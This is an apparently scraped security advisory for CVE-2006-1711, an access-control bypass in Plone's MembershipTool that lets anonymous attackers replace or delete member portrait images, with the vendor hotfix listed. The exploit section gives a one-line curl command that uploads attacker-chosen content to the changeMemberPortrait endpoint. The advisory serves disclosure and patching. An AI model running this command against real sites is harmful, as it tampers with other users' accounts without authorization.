Plone MembershipTool Access Control Bypass Vulnerability
BID:17484
Info
Plone MembershipTool Access Control Bypass Vulnerability
| Bugtraq ID: | 17484 |
| Class: | Access Validation Error |
| CVE: |
CVE-2006-1711 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 12 2006 12:00AM |
| Updated: | Apr 12 2006 11:22PM |
| Credit: | mj reported this issue to the vendor. |
| Vulnerable: |
Plone Plone 2.1.2 Plone Plone 2.0.5 Plone Plone 2.0.4 Plone Plone 2.5-beta1 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha Debian Linux 3.1 |
| Not Vulnerable: | |
Discussion
Plone MembershipTool Access Control Bypass Vulnerability
Plone is susceptible to a remote access-control bypass vulnerability. This issue is due to the application's failure to properly enforce privileges to various MembershipTool methods.
This issue allows remote, anonymous attackers to modify and delete portrait images of members. This may help attackers exploit latent vulnerabilities in image-rendering software. Other attacks may also be possible.
Plone is susceptible to a remote access-control bypass vulnerability. This issue is due to the application's failure to properly enforce privileges to various MembershipTool methods.
This issue allows remote, anonymous attackers to modify and delete portrait images of members. This may help attackers exploit latent vulnerabilities in image-rendering software. Other attacks may also be possible.
Exploit / POC
Plone MembershipTool Access Control Bypass Vulnerability
Attackers may use standard web client applications to exploit this issue.
The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:
curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
Attackers may use standard web client applications to exploit this issue.
The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:
curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
Solution / Fix
Plone MembershipTool Access Control Bypass Vulnerability
Solution:
The vendor has released a hotfix to address this issue.
Please see the referenced vendor advisories for further information on obtaining and applying fixes.
Plone Plone 2.5-beta1
Plone Plone 2.0.5
Plone Plone 2.1.2
Solution:
The vendor has released a hotfix to address this issue.
Please see the referenced vendor advisories for further information on obtaining and applying fixes.
Plone Plone 2.5-beta1
-
Plone PloneHotfix20060410.tar.gz
http://plone.org/products/plonehotfix20060410/releases/1.0/PloneHotfix 20060410.tar.gz
Plone Plone 2.0.5
-
Plone PloneHotfix20060410.tar.gz
http://plone.org/products/plonehotfix20060410/releases/1.0/PloneHotfix 20060410.tar.gz
Plone Plone 2.1.2
-
Plone PloneHotfix20060410.tar.gz
http://plone.org/products/plonehotfix20060410/releases/1.0/PloneHotfix 20060410.tar.gz
References
Plone MembershipTool Access Control Bypass Vulnerability
References:
References:
- Plone Homepage (Plone)
- Plone Hotfix 2006-04-10 (Plone)
- Ticket #5432 (defect) (Plone)